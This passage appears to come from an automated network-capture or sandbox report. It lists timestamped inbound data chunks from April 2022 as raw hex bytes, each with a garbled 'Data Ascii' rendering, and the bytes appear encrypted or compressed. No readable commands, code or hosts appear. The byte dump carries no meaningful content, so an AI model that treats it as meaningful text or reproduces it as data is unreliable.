                                                                              2022-04-26 19:08:56 UTC2231INData Raw: 95 cd 88 b1 7c 03 19 27 a2 8b 36 e6 c0 60 63 45 4a 5c c8 59 f8 ea f2 54 74 09 8f 2b 03 e1 14 0f 0a 8b 60 78 3e 7f 2c b1 ec a2 3d 5a 68 95 7e 13 f5 8e ef 87 63 f0 04 0d 04 ce 3d 96 81 c8 a9 e3 c4 e7 be 2a 84 24 80 2c 3f 92 31 c6 8c 46 4d 9e 46 2b fc 30 50 ac 84 9d d5 14 02 11 88 4c 61 24 81 00 93 a3 16 a5 1c eb ba e2 d5 c5 b2 be 00 d5 bd b0 b9 11 b3 af a9 63 33 e6 b9 f1 e9 c6 f9 6f 74 a0 fc 2b 35 09 1a c1 11 20 91 44 22 69 47 ae 02 b6 3d 2b f3 9f 50 bf 56 ea 6c 00 a0 db cf 2f 8b 02 50 e1 dd ac a4 3f 92 5a 11 f5 d1 a2 d3 f3 96 c2 14 ed 5a 16 f0 bc 44 2e 73 0b 6e b2 4a 86 db bb 0f a4 f3 87 dd 24 38 21 eb 0e 32 14 88 8b 25 4b 76 94 fa d7 e5 03 ef e3 05 91 61 e9 8a 1e 33 9f ef b4 cf 44 84 64 f3 ab af 3d ef 59 53 17 a3 81 83 dd 45 03 ab 1c 0f f7 ef 14 1f c9 f4
                                                                              Data Ascii: |'6`cEJ\YTt+`x>,=Zh~c=*$,?1FMF+0PLa$c3ot+5 D"iG=+PVl/P?ZZD.snJ$8!2%Kva3Dd=YSE
                                                                              2022-04-26 19:08:56 UTC2247INData Raw: e8 b0 7b 8d 6e 36 1e 9a 32 50 72 1a df 9e 91 f9 1d e3 ce 6c 32 44 4e c3 86 ed 2e 4e d9 31 8d cc 74 63 a3 83 b2 87 27 ff 58 3d 70 18 1a da c4 bd 10 fc 33 30 2a 01 84 a3 bc ee 23 ed f9 86 e0 85 cd da 2c 73 49 c9 05 ef 78 e2 0e da ed 3e ec ba cd f9 a9 6e e3 bf b0 28 77 4f 47 18 10 91 07 ca d3 5d 18 cb f1 6d 93 43 3e ad 34 a9 e3 c7 7d d8 f1 b9 b3 06 a2 57 d2 c6 af 2a 7b 5b 90 a0 7c 69 37 57 c2 63 1d 8a ba 45 e0 1c e0 4c cd 07 74 d3 b4 b3 53 7f 63 0c 8e 61 f6 61 f4 8c c3 db 56 f6 9d b7 31 ae 18 35 00 be a2 e8 85 12 6f 95 d3 53 18 76 0f 7a 66 cc a7 1f 27 2c 30 88 07 f4 fe b9 ee 8f 12 a8 55 f3 b3 e0 3a 2e 52 5d c0 bb 77 a4 48 32 3a 25 fc c4 ef 34 e6 2c 3d 38 43 17 fd 43 9c 68 9b fa e2 a3 3a 89 0f 9b fd ac 35 73 06 b3 f7 4f 7c 6b c4 4e d4 be 89 57 7a 98 f6 55 be
                                                                              Data Ascii: {n62Prl2DN.N1tc'X=p30*#,sIx>n(wOG]mC>4}W*{[|i7WcELtScaaV15oSvzf',0U:.R]wH2:%4,=8CCh:5sO|kNWzU
                                                                              2022-04-26 19:08:56 UTC2263INData Raw: 76 87 84 f3 39 76 cf d7 d4 59 50 b1 db 2a 25 82 db b4 b6 f4 cb 31 a0 4d e5 84 16 5c a4 fa 4e d1 37 16 20 9e 4d 53 0f f1 49 e8 25 d1 78 96 d5 2a 32 18 cf 58 e6 77 32 8d 02 c5 d8 f9 76 35 ab c7 d7 1e ab b6 12 2e 76 4f 2b 27 1a 67 97 91 9a 04 46 b3 08 18 16 fa 67 b8 82 56 2a 95 ca c1 e7 a0 11 15 cd ce 3a 99 3b 8e 60 9c cf c8 80 c1 ae 73 b2 c6 ca c6 d7 74 fb 95 43 51 84 04 55 43 0f db 6a 02 f8 e7 99 1d 1a f7 99 5b 31 3a e8 b3 7a fd 42 cb 23 e4 b4 18 e3 99 f0 e7 5a 2d cf 24 39 7d 36 d9 7a 91 1b 8a af 95 d8 28 d5 49 bc a9 3d 11 89 a9 d1 ef 83 cf d3 91 da 51 4b 30 bf 04 f4 3f ef cc d1 c6 bf bf ce ba 8d a7 22 2d a4 5e 30 56 91 f1 c2 4a 52 73 6a 4f 68 7a e6 5e f5 14 c8 81 77 bb a0 57 f5 6b 56 5f 79 23 91 bb 00 06 62 50 0b eb 17 36 16 41 f2 17 ea 34 f1 79 f7 64 7e
                                                                              Data Ascii: v9vYP*%1M\N7 MSI%x*2Xw2v5.vO+'gFgV*:;`stCQUCj[1:zB#Z-$9}6z(I=QK0?"-^0VJRsjOhz^wWkV_y#bP6A4yd~
                                                                              2022-04-26 19:08:56 UTC2279INData Raw: fb ff 59 69 b5 c0 e0 78 de c7 34 01 34 7d 79 69 4c 18 79 57 15 75 2a 22 61 88 5d d5 15 7a dd c1 58 b9 f9 47 aa ec 5b 9e 90 3c 46 e7 ea ac 7a 68 d7 e2 cb 99 6d 55 09 a1 d1 2e 1e a2 3b d7 72 23 21 77 12 75 71 6c 7f 95 1d 6d dd 6e a3 4f 5b 46 cb 22 d6 fc cc 69 34 de e2 33 72 b4 f2 75 99 fe dc 85 24 b5 83 a5 a7 95 9b c6 40 85 76 24 d6 1b 28 47 26 15 d9 1c 04 93 49 6b fa 0a 6c 7e 21 68 1f 21 6a 5d 55 1c 25 9f b6 7b f7 0b 79 78 20 e4 e1 2d a6 b4 e0 0f f7 76 dc 64 e1 03 4a cb c9 e4 37 5b ee d3 2a 24 f5 bf 3b f8 18 73 22 6c 88 99 99 85 56 2a 51 a9 c7 ba 29 17 ff f5 ec de fe 0d ee 4b ba 24 c7 09 ff 8c 0e f8 79 4b 61 37 f7 1e 5e 15 bb dd c6 82 9c 2a 68 f0 af 11 54 1b 74 12 78 b5 5a 11 64 66 32 c8 75 b0 71 06 14 3e be 6b e3 a0 d0 9c f8 e7 72 66 a8 2a e0 69 a9 3e 06
                                                                              Data Ascii: Yix44}yiLyWu*"a]zXG[<FzhmU.;r#!wuqlmnO[F"i43ru$@v$(G&Ikl~!h!j]U%{yx -vdJ7[*$;s"lV*Q)K$yKa7^*hTtxZdf2uq>krf*i>
                                                                              2022-04-26 19:08:56 UTC2295INData Raw: 79 70 a0 d0 4b 7d 63 a4 16 06 f5 60 7f e9 83 0a d7 c1 b3 b5 08 a9 28 c1 6d fe d7 67 ea a5 a3 0b 0c ef d9 e8 05 52 42 61 d3 92 56 3f 3d 0d f0 a4 f0 ed 92 81 0e 35 23 f3 86 c6 fa 2b c3 5b 81 e3 97 71 c3 8b 82 57 a0 22 f1 f2 44 9e 77 8c 12 36 47 90 d1 c1 4a 03 d3 64 2b 64 f8 7a 78 12 03 dd f1 9e 74 3b 7b a0 d9 ee 42 36 32 0c c9 c8 2c 25 f4 bd 93 e5 3d 65 a7 4f 67 9c a3 dd db 76 86 27 e5 14 88 81 7e 8e f3 b7 71 1a 0a 77 25 c7 6d df 79 a9 71 10 83 50 1f 96 05 34 37 f5 c6 51 b4 1c dc 00 e7 7d 72 26 6f 65 b5 8c a6 c1 c0 b9 ef 66 cb 69 de e5 c9 65 67 84 cd 3a 69 0e 83 72 64 23 18 6b 95 d4 9f 8f 59 ce ce 6e 77 1c 87 e5 b2 d3 8c 60 01 b0 17 31 c9 b9 10 94 58 ca db a0 8e d6 af f4 f8 b2 a2 c6 70 49 53 8f 37 be 03 ff 6e 86 73 c1 6b b6 71 b0 e6 2e 01 cf fa bc 46 d3 30
                                                                              Data Ascii: ypK}c`(mgRBaV?=5#+[qW"Dw6GJd+dzxt;{B62,%=eOgv'~qw%myqP47Q}r&oefieg:ird#kYnw`1XpIS7nskq.F0
                                                                              2022-04-26 19:08:56 UTC2311INData Raw: 5a 3f 94 ea 2b 29 9b 66 49 ba 45 03 94 cb cf 91 d2 ee 59 42 6f 3d 86 78 62 23 0e 86 ab 20 0a 4c 7b 9c 42 0d ef 07 89 f6 be 13 44 cf b7 cc 04 7f 41 3d 61 56 86 c7 16 70 a9 0d 4b d8 15 0c 43 38 30 cb 37 7b 9e 46 76 e6 b8 e2 8c 4a b0 46 75 1a f3 88 62 b9 c2 d3 fb 18 a3 3d 76 03 f7 36 e7 97 04 ad bb d8 6c a2 20 41 ea 62 46 44 6d e9 e5 2f d2 89 14 71 db 1b f1 eb 64 ee e4 fe d8 c8 8b 8d 9c 2b f4 7a dc e8 65 2a b9 ca a9 4f e2 17 3a 26 ec 50 79 90 bd a3 5b 86 32 74 c8 00 6a 70 8f 0d 66 2f 9b 15 e1 ee e3 60 0c 0a f0 f7 b5 29 c6 e7 e9 7c 59 00 c0 84 86 84 67 82 05 8d b3 29 ac 46 00 41 f5 2b 04 a0 55 71 b1 4f f8 e5 eb 05 83 77 b6 74 c6 0b 84 7e ee b1 0e 37 c4 9d c7 f2 ee c8 bc 7f 73 ac 45 69 fb ba c9 26 0e 88 44 41 b1 8b 9d 12 00 22 a2 39 41 a1 1f e4 26 49 0a 81 d3
                                                                              Data Ascii: Z?+)fIEYBo=xb# L{BDA=aVpKC807{FvJFub=v6l AbFDm/qd+ze*O:&Py[2tjpf/`)|Yg)FA+UqOwt~7sEi&DA"9A&I
                                                                              2022-04-26 19:08:56 UTC2327INData Raw: d7 45 e7 ba ab 4d ce ae fc 8b 80 2c 10 45 0d b0 99 eb fb 71 d2 9d 18 62 b7 c5 30 47 ae 78 c8 fa 5f 25 d2 f1 87 7a 51 7f 4e 4f f6 d8 c0 bd 9e dd b7 13 c5 48 ec c6 0f d8 cd fa 12 3f f3 7f 84 5d de a0 02 cd 33 47 95 6f 1d ae f6 39 78 2e 2e 8d 28 73 6e 61 c0 b6 00 19 f9 a5 3a 33 49 26 bb 97 46 7c 0d 9c cb 05 82 cf ec d9 45 29 be 4a e5 db b7 74 52 06 e1 d7 91 37 21 13 f7 78 80 a0 9f 44 e5 ae 4d c6 7e 41 57 94 8d 37 5a 45 df 4b 9c 57 ca b1 20 d9 6b ca 97 47 8c 06 40 4d c8 9a 7a f5 f9 47 4d 85 8e ab 52 0b 7b f1 95 f8 4e ce bb 9a 40 2b ac 6e 65 5f 29 38 93 32 70 ac 12 e1 cf 08 e0 cc fb 94 bd 8b 0c af 48 bf 19 77 72 6e 38 0c 07 20 54 f0 65 2d 20 fd f7 ac 83 93 a4 b0 ae 71 cf 7a 9e d2 49 bb 34 d1 41 79 0d 33 b7 b7 70 04 9b f2 f5 86 b7 10 67 99 d7 b1 b4 c2 d6 64 11
                                                                              Data Ascii: EM,Eqb0Gx_%zQNOH?]3Go9x..(sna:3I&F|E)JtR7!xDM~AW7ZEKW kG@MzGMR{N@+ne_)82pHwrn8 Te- qzI4Ay3pgd
                                                                              2022-04-26 19:08:56 UTC2343INData Raw: be 74 31 93 c5 69 38 66 50 b3 3b 7b 51 cb 13 65 46 fb 86 98 cb f7 b3 4e e8 56 16 b5 7f f4 65 59 f3 3d e5 22 e7 f9 d7 4a 5f dc cd 33 fd d9 9c bc 83 fd ea a7 dc 6f 61 91 2c 3f 0b 56 96 38 03 97 93 8d fe 24 06 20 36 80 be 2c c8 e0 d4 a6 da 43 c2 14 77 6a 5d 71 4d a4 86 2c 62 c7 aa aa 6b 6a 4e 62 6a 91 64 1f 40 76 8c e6 2b 4d 3a 7f 3d 0a ae b0 d6 60 e9 47 ce df b7 61 eb 61 40 00 4d 1c 21 8d bd 52 e1 32 00 fb c0 29 72 20 d8 f3 a7 50 64 c2 38 bf 67 3a 20 a8 c0 f5 58 a6 1b 7c fe 86 ed fb 51 64 c1 ae a4 fc 15 a1 0e 6f 86 a2 f2 2c 0a 07 b3 a3 d8 e5 6f 9b 30 92 c3 5c bb f3 c7 21 8e 55 6d 39 92 c8 f7 65 a8 f0 94 21 6d da 6d 1f f2 ff af d3 b9 70 dd 6a 3a 72 ee b6 69 c4 d5 c2 eb c7 9a a3 da d8 71 fd c9 08 b9 37 f8 4f 2f e4 cb 82 45 9e 88 8e c7 f0 ca 3d 33 33 29 51 67
                                                                              Data Ascii: t1i8fP;{QeFNVeY="J_3oa,?V8$ 6,Cwj]qM,bkjNbjd@v+M:=`Gaa@M!R2)r Pd8g: X|Qdo,o0\!Um9e!mmpj:riq7O/E=33)Qg
                                                                              2022-04-26 19:08:56 UTC2359INData Raw: ab d0 10 0e ab f2 e5 b5 c5 3f ab a2 58 12 2c 29 f4 fc e0 1a f8 40 1e 40 cf 09 17 33 df c0 9b e0 64 5e 5c ae cb 19 de 24 f9 b4 f0 55 7b f2 84 50 13 d8 fe 10 24 bf 47 b9 c3 72 ed 30 f5 45 40 71 19 ec 19 c8 67 cf e2 9d e7 65 a5 93 18 76 33 01 77 a3 94 20 80 b8 cf 7b c8 13 e2 68 c8 d4 b1 95 94 32 1a 50 7c 1f b8 45 22 87 8f 78 8f 21 7b 3f c7 44 97 13 4c 8a 03 8e fa 38 de 1e b8 a6 52 9b c3 e6 f7 be c9 05 30 91 5a f6 27 14 80 f6 4a f7 d0 c2 6d 80 ef ec cb 31 ff 13 50 fb f3 07 77 d9 fe d6 8e da 6a c5 08 c3 fc af 0d 41 e1 13 42 5e 50 cf a3 2b 9e 46 77 2e c3 78 a4 68 0c 5e a0 8c 5b c7 a4 bf 5c ed 5e 88 3e 03 89 cd ee 31 48 ac fc a6 e6 e2 5a a2 56 07 49 c7 48 e2 d9 8d 84 76 d4 e0 cd 4b 0e 4a 57 6a 0f 69 5c e5 a3 2a 22 db 4f af eb d5 75 a8 af d9 34 8c 2f 76 23 19 e7
                                                                              Data Ascii: ?X,)@@3d^\$U{P$Gr0E@qgev3w {h2P|E"x!{?DL8R0Z'Jm1PwjAB^P+Fw.xh^[\^>1HZVIHvKJWji\*"Ou4/v#
                                                                              2022-04-26 19:08:56 UTC2375INData Raw: 9d f5 5a a1 fe 5a c1 49 2e 8d 72 8c fa 36 a1 96 ce 05 a5 a5 db 62 b0 75 74 74 97 97 2d 08 a0 dc f1 13 a2 84 50 4b 39 3a ec f8 ca e1 c9 c9 f1 1c ac 7a 88 a1 c0 f9 79 06 c8 35 ab 48 e0 89 80 f5 33 4a d6 1e 03 26 62 a8 73 de 38 5f 0c 49 92 11 db e1 6b ee 51 33 7e d8 07 83 94 79 c5 f1 34 bb 1b 0e c4 4c 60 f5 07 27 46 14 47 0f 75 57 05 d5 c8 6d 0b 7c b5 3f 47 a0 8e b3 f4 5e 0f ab 71 d9 f5 4a 58 08 54 d0 2c 71 91 aa 1e 38 d4 bf 0f 85 a0 97 80 c3 7f 83 4d f4 5e f8 d5 65 e6 b7 01 18 7f 85 c8 b9 9f ba 99 2f c4 83 4d 2b a7 8b 3b 7f 4f ae da f6 64 ac f0 6a e6 51 43 3a b4 f2 5f 13 df 4d ee 17 25 9f 20 10 f1 fe d6 77 34 a9 02 d4 e6 0f 94 e3 10 0d 69 3e 96 84 99 1a b6 00 32 8e 84 af f7 42 05 5e d0 72 23 3e db d4 d0 02 6e 6d 5e 5f 5e e6 62 e1 d6 5f 9f 4b 4b c0 3c d2 86
                                                                              Data Ascii: ZZI.r6butt-PK9:zy5H3J&bs8_IkQ3~y4L`'FGuWm|?G^qJXT,q8M^e/M+;OdjQC:_M% w4i>2B^r#>nm^_^b_KK<
                                                                              2022-04-26 19:08:56 UTC2391INData Raw: 74 18 9c 7b ce d2 77 63 d5 7c 03 22 94 20 9b 8b b3 4d cb 2b 1e 68 2a ce d3 1a 84 c6 cf de 6c ba 67 59 07 ef 2c f8 de bf 0f 46 6b 56 b9 33 e8 c8 ed a5 1e de 51 45 3d 17 7f 43 87 8e 10 82 a4 70 d8 47 a1 f2 a7 1e 44 4a ef 16 a2 07 e4 71 ea 54 70 04 5f 0c 07 8e a4 8f a3 12 e6 21 54 ac 01 fe 98 22 e4 12 b1 e1 4d 40 01 bb 4b 25 e6 00 d9 51 2d a6 6d 10 29 d4 c7 33 2c 99 8e 8b 6d d2 c2 5b bb 62 77 43 e3 b4 a9 d5 2a c7 ce 68 e0 35 63 a9 8b a4 17 12 05 d8 f5 20 b2 e4 f3 76 48 56 a0 b9 23 92 f2 26 de b6 3a 81 8b 22 c3 32 ff 13 14 e1 69 e2 17 1d d2 b1 f7 ab cb 6f 10 a8 47 b1 e6 08 30 fa be a9 6f 98 d8 80 6b be 5b 48 8a 86 fc 9b 3e 0d 6b 66 3e b1 73 18 04 1e 53 41 9b 26 ec 39 c1 fc 31 8f ea 9a a8 a0 88 a4 47 5e fa c6 ba eb 7d e4 8a 2f af 2d 25 73 8e db 64 58 a9 0f 67
                                                                              Data Ascii: t{wc|" M+h*lgY,FkV3QE=CpGDJqTp_!T"M@K%Q-m)3,m[bwC*h5c vHV#&:"2ioG0ok[H>kf>sSA&91G^}/-%sdXg
                                                                              2022-04-26 19:08:56 UTC2407INData Raw: 26 a4 79 4b d1 39 f6 36 17 48 f1 58 45 08 ec 83 d4 7f c7 7c 7e 07 1a dd 3d 5a a3 4d e0 b5 f7 64 3f 4e 14 74 41 32 e7 4f 19 94 d4 b4 d1 dc f2 a4 d2 ed c4 81 64 b8 28 cc 33 0a 20 57 9d 0b 99 96 3e b8 87 41 ff 45 67 e2 cd 61 65 26 c2 cf 97 c0 df 61 30 d5 5b a5 6c 44 9e 54 1e cc f7 dd 85 af 23 f7 9b 04 6a 2c d7 e7 f2 cd 7a a2 0e 0b df c2 8e ed 88 90 75 a4 7c 55 dd d9 c1 a6 26 7b 16 2a 0b 27 e6 77 75 ba a3 58 5c 0d 4c e5 2c 48 e4 40 f1 3a 7c 38 10 a8 9c d0 fc e4 3c 1c 65 4c cc 4c b6 c6 7c da 3e 5f 5f 65 f8 78 de a7 e4 b6 aa d3 89 dd 7d b1 10 3f 24 87 1b 0d 7a 61 c0 3c ec e2 43 5f 3b 9e 00 10 6c 1b 57 d5 ab a1 fd 2f 2c 52 b7 57 36 87 d3 3b a4 b2 5d fb 4b 1b 88 a5 ae 15 67 38 8d ce 27 6d 03 b9 84 18 2d 07 25 52 ba 29 84 cd e9 f1 92 9b 5d ba e2 5c 73 99 ba 62 74
                                                                              Data Ascii: &yK96HXE|~=ZMd?NtA2Od(3 W>AEgae&a0[lDT#j,zu|U&{*'wuX\L,H@:|8<eLL|>__ex}?$za<C_;lW/,RW6;]Kg8'm-%R)]\sbt
                                                                              2022-04-26 19:08:56 UTC2423INData Raw: 14 80 f0 62 93 63 d5 4d b2 df bf b5 fd fe 83 f8 a0 20 3e 56 78 31 ee 0d 21 3c b5 7e 75 86 f1 2b 28 59 f3 89 d1 6a 30 97 c5 35 c9 b8 44 56 05 f1 ac af 7a 35 81 e7 da b4 cb 92 35 08 ff 13 6c e1 79 2a dc 2b 61 60 4d 11 3e b7 e5 3c fa 8b a7 ed 8b b7 a2 4b 47 cd 6c a5 0b 2e 61 bc 46 7a 98 64 f7 bd 53 95 94 c5 d7 ce 3a ca af 40 71 5f 75 e1 a0 c2 56 f4 4a b0 2b a6 00 f4 ae 0a 0e c7 3c 09 2c 80 d4 22 26 82 8b f4 be 39 84 bc 9d 60 47 e5 33 1e 1c ec d4 3a 5d 31 38 30 ae 14 42 47 1b 48 ef f7 b0 9e 80 d4 b9 e1 39 4d 7d 59 b5 a2 92 91 a7 e2 1c 91 4a 61 1c bb 6d 98 8a e2 a1 a3 64 34 e9 1f 49 f0 8f 47 2e 18 b0 e6 37 c6 c7 35 b1 89 5d 32 ae a2 26 8e 22 87 82 2c f7 76 a2 e6 3a f9 38 4b e5 3a 46 2b e2 5c 04 ca 1f 18 a6 99 f0 28 4d 02 bc cb 59 1f 4e 04 9c 5d 0e 31 24 26 26
                                                                              Data Ascii: bcM >Vx1!<~u+(Yj05DVz55ly*+a`M><KGl.aFzdS:@q_uVJ+<,"&9`G3:]180BGH9M}YJamd4IG.75]2&",v:8K:F+\(MYN]1$&&
                                                                              2022-04-26 19:08:56 UTC2439INData Raw: 87 24 47 15 25 f9 43 c2 32 ef 08 1a 03 27 f9 a6 32 a7 6f 77 8e b9 94 9a fe c4 f6 08 af 15 f6 ad b9 b3 67 6a 92 d4 00 c5 04 57 cf 56 a3 49 10 b3 b6 e0 6a 28 20 ed 12 51 14 c3 b9 94 af f5 13 6e 49 f7 9d 50 35 73 d1 8b e0 40 cb 0d 82 3c 99 54 e0 ca 54 03 f3 a4 41 0a 33 d5 b2 15 1d a1 e6 38 af 11 2a b3 23 f4 11 17 f4 cf e7 63 77 85 f8 65 fd 97 fb 34 a0 f1 21 84 86 a3 ab 13 b3 2e 09 28 3f b4 b3 57 81 cc a7 d0 2b 76 3c ca c6 56 da 8d 00 56 84 fe e8 63 b5 41 a7 37 ff e8 16 dc 0b 00 f4 7f 76 62 5e 6f c0 28 76 23 7d 52 8d 0a 7c 58 31 3e 45 15 13 50 99 c9 cd e7 1d 38 2a 27 94 eb dc 2e 63 2e e2 23 88 55 94 99 55 ed fc 6c 8c 22 8b 27 7c e6 22 61 7b 91 6d fb 27 14 25 ef c7 95 2c fc 49 34 8b b8 5b e8 eb e7 47 75 b3 69 02 e0 0a 68 26 e2 a7 29 93 5c 28 80 4c fc 1f 04 2a
                                                                              Data Ascii: $G%C2'2owgjWVIj( QnIP5s@<TTA38*#cwe4!.(?W+v<VVcA7vb^o(v#}R|X1>EP8*'.c.#UUl"'|"a{m'%,I4[Guih&)\(L*
                                                                              2022-04-26 19:08:56 UTC2455INData Raw: 2d a3 35 1b d8 6f dc 57 dc 39 9d 70 10 c7 eb 24 8d c0 14 29 5d 5d 11 93 bd da c0 62 c2 01 6f e7 52 90 8b d0 fc 2c a6 d6 18 52 b9 84 ff 17 d5 3e d2 3a 55 d0 ba 7d 28 12 92 64 39 bc af f8 3e 79 89 54 59 49 d6 6b a4 26 99 62 39 a3 94 9e 32 14 73 4a 67 ed 6e db 73 50 5c 19 ed 20 cc 85 08 bb ba e6 e9 f0 c7 72 14 9b 05 9a e5 3f ba b3 25 54 3a b4 e4 1b 2a 58 96 12 7f 69 29 62 00 fd ac df 6a 63 4f bf de 92 1f a6 26 2a 7a 74 f5 00 11 e7 05 01 6d 9f a4 54 b6 a9 b8 fc c6 92 af b3 3a 61 e4 6a 13 87 05 37 f0 88 cd 4a 64 07 23 e3 70 dc 79 3b b2 9e cf c7 23 b0 8e 07 60 83 4f 54 fa c2 46 7c b3 01 96 a1 7a 7e 60 d9 90 d0 0f 40 c0 45 89 3b c4 b6 ac 64 8b 8d e6 8f cd 20 ce 0e 59 20 e5 51 b6 fe f0 45 a0 46 98 84 67 d5 fb 0d 71 10 3d f3 b8 5f d3 04 b6 c4 11 90 5d 47 fb 37 c6
                                                                              Data Ascii: -5oW9p$)]]boR,R>:U}(d9>yTYIk&b92sJgnsP\ r?%T:*Xi)bjcO&*ztmT:aj7Jd#py;#`OTF|z~`@E;d Y QEFgq=_]G7
                                                                              2022-04-26 19:08:56 UTC2471INData Raw: 50 68 f0 30 62 f6 f5 b1 2d 37 ec 81 a9 21 12 44 dd 30 b1 a5 a3 51 ee e8 d6 2b d9 fa 05 fa d2 05 14 75 ef b8 42 c6 49 d8 bf ab a5 48 46 91 d8 b8 a6 02 46 0c c0 b2 81 c7 f1 cd 1b 8c de 15 7b e3 db 0d 4d bc 17 fa a7 81 8e 38 d9 7a d1 bd 94 f4 8c 00 2b 6a b2 ac 4f f2 65 c3 82 72 cf b9 c6 6b a8 95 1e e7 9f d7 1b 64 23 40 e6 b3 41 c7 b7 58 2f 8e 62 bf 83 e3 3e 5b c4 27 79 22 85 00 5c 0c cf 05 9b 8f fa ee 56 b6 64 99 dc a9 e2 c3 2a ca d8 21 7b 6f 0c 17 40 5c 13 2a ba 3b d8 4c b8 75 81 02 f8 81 95 3a b2 75 5f 38 aa 46 48 45 7f 3e 6e f7 98 b0 3a 6b 99 37 54 0d b6 30 11 61 a3 3f 4c dd bb 35 b7 62 ef 45 59 61 26 de 8d c2 84 a0 c8 4a 9e a4 01 7a 9a 95 f3 04 9b 44 ec 6c e2 a9 e3 a0 de 9f f7 5d be 94 62 61 1d 8c 0f b1 d4 3e 05 19 89 80 06 94 b7 f9 ae ad 93 7c 90 ce 08
                                                                              Data Ascii: Ph0b-7!D0Q+uBIHFF{M8z+jOerkd#@AX/b>['y"\Vd*!{o@\*;Lu:u_8FHE>n:k7T0a?L5bEYa&JzDl]ba>|
                                                                              2022-04-26 19:08:56 UTC2487INData Raw: 4c 2a 4b 28 60 6c c9 0f c3 8f 75 da 89 10 8a 94 2f d5 3b cb 02 7b e0 97 61 7f 09 b9 05 77 35 8f 0f cd 3f 9e 0d 90 b5 7c 91 b0 95 83 c1 60 8d 45 ec ff f9 7f c9 91 3a b0 4d 24 8a 7d 7d ad 24 a9 cc 58 35 e7 91 f7 dc 73 e8 0e fc 30 1d b3 f3 45 67 49 7b dc 82 3c fc 8e b3 f2 f0 e1 80 15 9c 16 0a 04 7f ca 10 bd 2a ad 99 bf 45 46 9c f5 ff 47 7c dc b2 cb 97 95 b5 51 6a bb a5 a0 8c 63 bf ee 1c 75 4c dc 14 33 21 59 01 fe 6f 41 42 95 eb 63 e3 0c 29 f0 35 6d 6a 02 d7 d8 8a 6f 8e 1b 7b a6 66 fd 39 11 5a 49 46 ef bd 37 90 75 f8 ee b9 c0 3e bb f6 93 31 4d 71 6a ad 8b d6 41 37 21 84 83 a8 e0 f2 cd 74 d5 81 42 3b c4 38 04 b3 0b 41 64 2f a5 44 38 5e c4 6a 51 ff ea 1d 2a a3 08 02 75 22 b6 32 86 a5 b4 14 f8 1a 07 85 be 7b e7 90 bb b0 99 26 44 3b 57 9c 79 78 9a e9 8b d4 d5 81
                                                                              Data Ascii: L*K(`lu/;{aw5?|`E:M$}}$X5s0EgI{<*EFG|QjcuL3!YoABc)5mjo{f9ZIF7u>1MqjA7!tB;8Ad/D8^jQ*u"2{&D;Wyx
                                                                              2022-04-26 19:08:56 UTC2503INData Raw: 49 33 10 9e 45 da 22 2e 18 23 4d d2 43 9a 95 10 81 4f 72 5e b4 3b 68 a2 49 8c c0 72 79 6a ed ae 63 e6 3d d5 af 8f e5 da d7 e1 f1 56 d5 67 bc 38 54 e7 bb c1 4d d7 f9 50 96 76 db 90 f9 7d 82 4a 28 e6 a1 0c e7 15 2e 40 42 ea f6 e6 01 07 f6 b6 77 e6 07 e7 0e 6a 25 ce 81 df c2 09 2d c6 20 10 74 d8 fe 45 a4 cf 06 aa 23 d5 20 f0 f0 bd 0b 1e 90 25 cd cd 6e f7 4a 9e 99 f9 55 e1 f2 41 6d 94 08 e9 e0 36 28 a3 cb 99 5b fa 59 27 47 8d 97 2f 58 42 e7 0d 14 a7 1a 97 c5 b6 cb 41 6e 1a f4 85 36 89 72 82 cb e6 61 b3 a4 07 e6 b1 4f 4c 52 e9 ac d4 a7 6b a4 2a 13 22 42 16 bf b5 9b 95 05 ef 5a e2 ad 3f 8d d8 06 76 d6 25 29 b7 22 94 94 04 29 15 61 95 16 28 ff 06 bc b4 92 9c 3d af 62 b8 1f ca 8a 38 2c 1e b6 cc 49 71 be 49 00 8f 63 e0 f4 50 3a 1c 1c c1 cb 83 e8 23 0b cd 7a 6a ba
                                                                              Data Ascii: I3E".#MCOr^;hIryjc=Vg8TMPv}J(.@Bwj%- tE# %nJUAm6([Y'G/XBAn6raOLRk*"BZ?v%)")a(=b8,IqIcP:#zj
                                                                              2022-04-26 19:08:56 UTC2519INData Raw: 90 13 ef c4 0b 49 76 5d 27 f3 87 42 d6 62 27 17 bb df 7e 1d 07 72 52 59 ca ac fd a9 5f a8 95 ec 21 fb fe d0 f9 e6 bd ee 30 e0 6c 44 72 dd cf f9 8a 8c 77 4a e1 a5 5c 6f 0a 0f 47 8e 44 42 c9 82 18 67 40 5c 1e db 0a 77 78 8b d8 a0 92 2d fe b8 4b 5a db 1c 08 d4 7d 5c e5 2f 9f d7 1f a0 10 ea 04 50 54 a2 d9 32 36 07 22 81 26 c3 2c 0e 84 42 28 0e c3 eb a5 15 87 90 eb b5 3a 5a 04 ad 1d 7b 57 cc 56 36 ac 61 db b3 a3 ba 2f 32 0f 26 ca 76 05 ab cf 58 6d e3 39 30 18 6b 65 23 55 db ef af c7 f3 14 6e 84 64 2a 95 cf ff d3 b6 b1 5d 21 2b 21 f2 62 d1 de 48 7d 0d 24 41 67 61 19 f2 9a 6d 45 cc 96 1e 2a b8 33 e9 6b 01 41 58 dc 76 ce f1 19 0c dc 1c a2 16 58 46 70 bf 59 84 97 b7 4d b7 5c 33 53 d2 fd 01 bd 70 0f 5a 97 02 73 14 6f 5d 77 38 ab 45 4e 71 78 00 db 82 62 c1 67 a9 cc
                                                                              Data Ascii: Iv]'Bb'~rRY_!0lDrwJ\oGDBg@\wx-KZ}\/PT26"&,B(:Z{WV6a/2&vXm90ke#Und*]!+!bH}$AgamE*3kAXvXFpYM\3SpZso]w8ENqxbg
                                                                              2022-04-26 19:08:56 UTC2535INData Raw: 68 d7 7c 56 2a 0a e4 c9 49 f4 36 f5 9a ee b9 77 e0 1c 4f d3 0c 9b 07 d6 58 d7 01 26 1a 03 b3 20 a5 ee 1a bf 60 3a b1 df 1b e2 04 13 37 45 81 d6 4c f2 96 fa 05 b3 45 5a 4e c6 34 48 4b 9a 39 f7 30 09 be fb 23 04 0e 4e 84 60 60 53 33 5b 10 ec e8 c8 e0 55 64 1f 19 fd 94 9b f5 41 e1 ea 6a 8c 78 8b 74 3b 6f 47 6a d8 86 7d 11 8a a7 74 ba 4c 8a e7 b5 17 78 54 84 66 c3 a0 3a 86 bd bc dc a1 89 bf c2 f4 3d 3d 51 84 7c a8 b4 ee 19 27 52 50 f2 55 57 87 a3 2e 4d 54 65 a7 fb 37 3e 2b 0a 1f e3 2b 7f b1 c0 08 93 ad 25 f0 2d 0d f1 3e 91 b4 7e fa 5e f8 ba 76 bf c3 cb 3f 02 df ab cf 88 57 86 16 3b 66 15 ce 13 33 a4 bb 20 d1 26 3e cf b5 66 57 85 e9 ac d3 96 33 f5 6d 33 f8 